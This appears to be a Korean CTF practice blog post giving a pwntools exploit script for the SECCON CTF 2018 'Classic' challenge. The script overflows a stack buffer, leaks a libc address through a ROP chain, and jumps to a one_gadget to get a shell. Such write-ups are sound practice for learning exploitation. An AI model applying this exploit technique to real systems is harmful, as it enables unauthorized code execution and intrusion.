SECCON CTF 2018 Classic

System/Pwnable Practice 2019. 7. 28. 23:00

exploit.py

from pwn import *
  
p = process("./vuln")

e = ELF("./vuln")
l = e.libc

pr = 0x400753
main_start = 0x4006A9
one_gadget = [0x4f2c5, 0x4f322, 0x10a38c]

payload = "A"*(0x40+8)
payload += p64(pr)
payload += p64(e.got['puts'])
payload += p64(e.plt['puts'])
payload += p64(main_start)

p.sendlineafter(">> ",payload)
p.recvuntil("!!\n")

puts_addr = u64(p.recv(6).ljust(8,"\x00"))
libc_base = puts_addr - l.symbols['puts']
one_addr = libc_base + one_gadget[1]

payload2 = "A"*(0x40+8)
payload2 += p64(one_addr)
p.sendlineafter(">> ",payload2)
p.interactive()

'System > Pwnable Practice' 카테고리의 다른 글

Codegate 2016 CTF Watermelon (0)	2019.07.29
Defcon CTF 2016 Feed me (0)	2019.07.29
Defcon CTF 2015 r0pbaby (0)	2019.07.28
Pico CTF 2018 Can you gets me (0)	2019.07.28
Pico CTF 2018 Buffer Overflow 3 (0)	2019.07.27

JeonYoungSin

메모 기록용 공간

일	월	화	수	목	금	토
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31

SECCON CTF 2018 Classic

'System > Pwnable Practice' 카테고리의 다른 글

공지사항

카테고리

태그목록

글 보관함

달력

링크

JeonYoungSin

LATEST FROM OUR BLOG

LATEST COMMENTS

BLOG VISITORS

티스토리툴바